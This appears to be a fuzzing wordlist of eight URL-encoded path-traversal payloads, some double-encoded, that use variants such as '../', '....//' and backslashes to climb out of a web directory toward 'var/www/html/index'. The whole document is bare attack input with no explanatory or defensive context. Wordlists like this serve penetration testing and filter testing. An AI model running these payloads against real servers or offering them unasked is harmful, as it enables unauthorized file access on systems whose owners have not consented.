%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%5c%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%5c%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
